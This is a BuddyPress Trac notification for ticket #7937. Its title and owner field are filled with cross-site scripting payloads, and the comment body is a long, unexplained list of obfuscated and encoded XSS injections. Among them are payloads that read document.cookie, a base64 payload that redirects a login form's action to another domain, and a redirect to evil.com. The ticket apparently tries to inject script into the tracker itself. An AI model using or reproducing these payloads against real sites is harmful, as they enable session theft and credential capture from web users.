[buddypress-trac] [BuddyPress Trac] #7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l oNerrOr=prompt(document.domain) x> "'--!><Script /K/>confirm(document.domain)</Script /K/> '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt> a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)> %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG onLoad=prompt(9)> "><svg/onload=confirm(1)>;

buddypress-trac noreply at wordpress.org
Wed Jul 25 08:25:01 UTC 2018


#7937: --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img sRc=l
oNerrOr=prompt(document.domain) x> "'--!><Script
/K/>confirm(document.domain)</Script /K/>
'"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
%3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E <svG
onLoad=prompt(9)> "><svg/onload=confirm(1)>;
-------------------------+-------------------------------------------------
 Reporter:  safwa        |       Owner:  --><svg><x><script AND
                         |  /*/*/*>prompt`xssposed`</x> "><img sRc=l
                         |  oNerrOr=prompt(document.domain) x>
                         |  "'--!><Script
                         |  /K/>confirm(document.domain)</Script /K/>
                         |  '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
                         |  a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
                         |  %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E
                         |  <svG onLoad=prompt(9)>
     Type:  defect       |  "><svg/onload=confirm(1)>;
  (bug)                  |      Status:  assigned
 Priority:  normal       |   Milestone:  Awaiting Review
Component:  Core         |     Version:  3.0.0
 Severity:  normal       |  Resolution:
 Keywords:  has-patch    |
-------------------------+-------------------------------------------------
Changes (by safwa):

 * Attachment "evilsvgfile.svg" added.

 '<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>';  “
 OnMouseOver=”prompt`1`   "onmouseover=eval(atob('mylastcode in base64'));"
 <img src="a"
 onerror='eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInlvdXJsb2dpbiIpLmFjdGlvbj0idGhlZG9tYWluLm5ldCI7"))'
 <div style="background:<?php echo $colour ?>;">
 <scr<script>ipt>alert(document.cookie);</scr<script>ipt>  <svg
 onload=eval(name)></svg>  <img src="X" onerror="confirm(1);"
 “\x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E”  †‡•<img src=a
 onerror=javascript:alert('hacked')>…‰€
 <!%27/*"/*/%27/*/"/*--></Script><Image%20Srcset=K%20*/%3B%20Onerror=confirm%601%60%20//>
 "'--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Body/OnPageShow=confirm(`OPENBUGBOUNTY`)>/
 jaVasCript:/*-/*'/*\'/*'/*"/**/(/**/oNcliCk=alert())//%OD%OA%Od%Oa//</stYle/</titLe/<teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 ';alert(String.fromCharCode(88,83,83,80,79,83,69,68 ))//';
 '"--></style></scRipt><scRipt>alert(String.fromCharCode(88,83,83,80,79,83,69,68))</scRipt>
 <iframe
 src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>
 --><svg><x><script AND /*/*/*>prompt`xssposed`</x> "><img src=x
 onerror=prompt('XSS')> "><img sRc=l oNerrOr=prompt(document.domain) x>
 "'--!><Script /K/>confirm(document.domain)</Script /K/>
 '"--></style></scRipt><scRipt>alert(0x02F4B8)</scRipt>
 a>'>">t<i>p<img+src%3Dy+onerror%3Dprompt(%2FOPENBUGBOUNTY%2F)>
 %3C/script%3E%3Csvg/onload%3Dconfirm(document.domain)%3E
 #<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>#
 </Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Body/OnPageShow=(confirm)(document.domain)>#
 "><svg/onload=alert(/XSSPOSED/)> <svG onLoad=prompt(9)> "><svg
 onload=alert(document.domain)> "><svg/onload=confirm(1)>;
 "><svg/onload=confirm(document.domain)>;
 <script>alert();</script>”><<script>alert();</script>img src=x
 onerror=alert();>
 %3c%2f%66%6f%6e%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3c%2f%73%63%72%69%70%74%3e
 wp-
 includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=alert%601%60
 wp-includes/js/mediaelement/mediaelement-flash-audio-
 ogg.swf?uid=%22%5D%7D))%7Dcatch(e)%7B%7Dalert(document.cookie)//
 "/><object/data=data:text/html;base64,PHNjcmlwdD5hbGVydCgvT1BFTkJVR0JPVU5UWS8pIDwvc2NyaXB0Pg==>
 =xss%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3CInput/Type=Text%20AutoFocus%20*/;%20OnFocus=confirm(document.domain)%20//%3E%3CSvg%3E#
 <img src='test' onm\ouseover='alert(2)'>]";
 javascript:alert(document.domain);
 :///%01javascript:alert(document.cookie)/ %27-alert(document.domain)-%27
 >"'><script>alert(‘XSS')</script>  "</script><script>evil()</script>"
 ;<video><source%20onerror="javascript:alert(1)">
 “><script>alert(document.cookie)</script>
 <scr<script>ipt>alert(document.cookie)</script>  <table
 background="javascript:alert(([code])"></table>  <object type=text/html
 data="javascript:alert(([code]);"></object>  <body
 onload="javascript:alert(([code])"></body>  <script>
 document.location.href = "http://evil.com"؛ </ script>
 <SCRIPT>alert(“33")</SCRIPT>  <SCRIPT>alert(document.cookie);</SCRIPT>
 <SCRIPT>alert(document.domain)</SCRIPT>  {meme, src=
 http://dummy//onerror=eval(prompt(1))// }
 >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
 >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
 AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
 %22%2Balert(%27XSS%27)%2B%22   " ="" '></><script></script><svg
 onload"="alertonload=alert(1)""
 onload=setInterval`alert\x28document.domain\x29`

-- 
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/7937>
BuddyPress Trac <http://buddypress.org/>
BuddyPress Trac


More information about the buddypress-trac mailing list